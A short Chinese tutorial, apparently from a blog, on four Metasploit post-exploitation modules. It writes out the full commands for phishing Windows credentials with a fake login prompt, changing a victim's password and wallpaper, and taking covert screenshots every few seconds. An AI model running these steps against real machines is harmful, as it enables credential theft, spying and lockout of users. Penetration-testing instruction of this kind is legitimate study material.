一旦受害者的系统遭到攻击者入侵,攻击者就可以利用 Metasploit 框架中提供的 478 个后期开发模块之一来收集有关受害者的信息或证据。Metasploit 框架不断更新,使得后期渗透更加丰富多彩。通过 post 模块,后期渗透变得更加有趣。
在成功获取系统 shell 后,我们可以利用以下几个常用的 post 模块:
Windows 凭据钓鱼
当我们无法获得系统管理员密码时,可以利用此模块执行钓鱼攻击。该模块通过弹出登录提示框,诱使目标机器用户输入凭据,然后将凭据发送给攻击者。执行此攻击的命令如下:
use post/windows/gather/phish_windows_credentials set session 1 run
效果如下:
修改桌面壁纸
该模块赋予我们更改受害机器桌面壁纸的权限。在测试之前,我们需要准备 PNG 或 JPEG 格式的图像,并执行以下命令:
use post/multi/manage/set_wallpaper set session 4 set wallpaper_file /home/kali/Desktop/1.png run
执行此模块后,受害者的桌面壁纸将成功改变。
更改密码
此模块帮助我们更改目标机器的登录密码。在 multi/handler 上执行以下命令来执行攻击。请注意:要执行此攻击,我们必须具有管理员权限。
use windows/manage/change_password set session 4 set old_password 123456789 set new_password 12345678 set smbuser hp run
完成修改后,旧密码将无法成功登录系统。
Windows 屏幕截图
该模块允许攻击者匿名获取受害者机器的桌面截图。在 multi/handler 上输入以下命令:
use post/windows/gather/screen_spy set session 10 set view_screenshots true run
执行完毕后,我们将每 5 秒获取一张桌面截图。
这些 post 模块提供了丰富的后期渗透功能,帮助我们更好地了解目标系统并执行必要的操作。收藏此文以便日后参考!
暂无评论内容